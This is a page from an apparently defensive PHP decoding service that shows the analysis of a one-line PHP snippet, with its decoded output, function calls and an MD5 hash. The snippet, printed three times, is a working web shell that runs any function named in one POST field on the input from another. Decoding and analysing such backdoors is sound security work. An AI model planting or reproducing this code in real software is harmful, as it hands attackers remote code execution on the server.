Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if(isset($_POST["php_func"])){@$_POST["php_func"](stripslashes($_POST["php"]));};?>..

Decoded Output download

<?php if(isset($_POST["php_func"])){@$_POST["php_func"](stripslashes($_POST["php"]));};?>

Did this file decode correctly?

Original Code

<?php if(isset($_POST["php_func"])){@$_POST["php_func"](stripslashes($_POST["php"]));};?>

Function Calls

null 1
stripslashes 1

Variables

None

Stats

MD5 c22947c2862f99eca495fc2c34dfb242
Eval Count 0
Decode Time 105 ms